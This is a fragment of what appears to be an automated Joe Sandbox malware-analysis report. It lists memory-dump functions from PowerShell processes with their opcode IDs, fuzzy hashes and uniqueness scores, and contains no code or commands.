                                                                                                                                      • Source File: 00000018.00000002.3307681249.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_7ffd9b890000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: M_^$M_^$M_^$M_^$M_^$M_^$M_^$M_^$M_^
                                                                                                                                      • API String ID: 0-2452815496
                                                                                                                                      • Opcode ID: cfad986d6aabcb7dd436b3462ef7da774bd4c8b2c4bb5935930058db6551cc58
                                                                                                                                      • Instruction ID: e0677b4e17e5ca9dae0cae7b29736785f0da2bd671b4fc4c967bed99787c2262
                                                                                                                                      • Opcode Fuzzy Hash: cfad986d6aabcb7dd436b3462ef7da774bd4c8b2c4bb5935930058db6551cc58
                                                                                                                                      • Instruction Fuzzy Hash: 0B910353A0FADB5BEB27477948790907FA0FF1679470A02F6C0E98B0A3FD05790B8241
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B898BD3 Relevance: 7.6, Strings: 6, Instructions: 108COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.3307681249.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_7ffd9b890000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: M_^?$M_^@$M_^K$M_^N$M_^T$M_^Y
                                                                                                                                      • API String ID: 0-2127400921
                                                                                                                                      • Opcode ID: 26adb80e0b1586490d5e7e6948edb19b823c3a2086bb3e742104ba0b10a01581
                                                                                                                                      • Instruction ID: 1209433c9f1ca100ef023c93cd4227821dd51abdec75253c69ea10c490b635f9
                                                                                                                                      • Opcode Fuzzy Hash: 26adb80e0b1586490d5e7e6948edb19b823c3a2086bb3e742104ba0b10a01581
                                                                                                                                      • Instruction Fuzzy Hash: 0821F2A370883A8AD70A36ADBC159E87780DFA523938503F3E169CB1D3FC14A48786C0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Executed Functions

                                                                                                                                      Function 00007FFD9B98664A Relevance: .4, Instructions: 414COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000001A.00000002.3244274607.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_26_2_7ffd9b980000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ce9c6732015073234ddfb63c55be49ab19e4f7de50ab3c37b050048257ee3a31
                                                                                                                                      • Instruction ID: 0814d71142fa387fb11d4b471774a2b456edf98ac434c5837b68f85c2a026f3a
                                                                                                                                      • Opcode Fuzzy Hash: ce9c6732015073234ddfb63c55be49ab19e4f7de50ab3c37b050048257ee3a31
                                                                                                                                      • Instruction Fuzzy Hash: B6C15732A2FE8E1FEBA5DB6858659B57BD0EF55314B0901BED05DCB0E3DA28AD01C341
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B984400 Relevance: .0, Instructions: 32COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000001A.00000002.3244274607.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_26_2_7ffd9b980000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 72a21979a992706bf525df2abff1a5e5df2ba544d195d43435800c70d6bd8fde
                                                                                                                                      • Instruction ID: 9cef9e4c47575f3e2e53cacf48a22c0cb085f7de36eb9c38cd6674f7e45ea06d
                                                                                                                                      • Opcode Fuzzy Hash: 72a21979a992706bf525df2abff1a5e5df2ba544d195d43435800c70d6bd8fde
                                                                                                                                      • Instruction Fuzzy Hash: 22F08C31A0E9498FD7A8EB6CD4609A877E0FF05324B5600BAE06DCB1B3CA35EC40CB40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%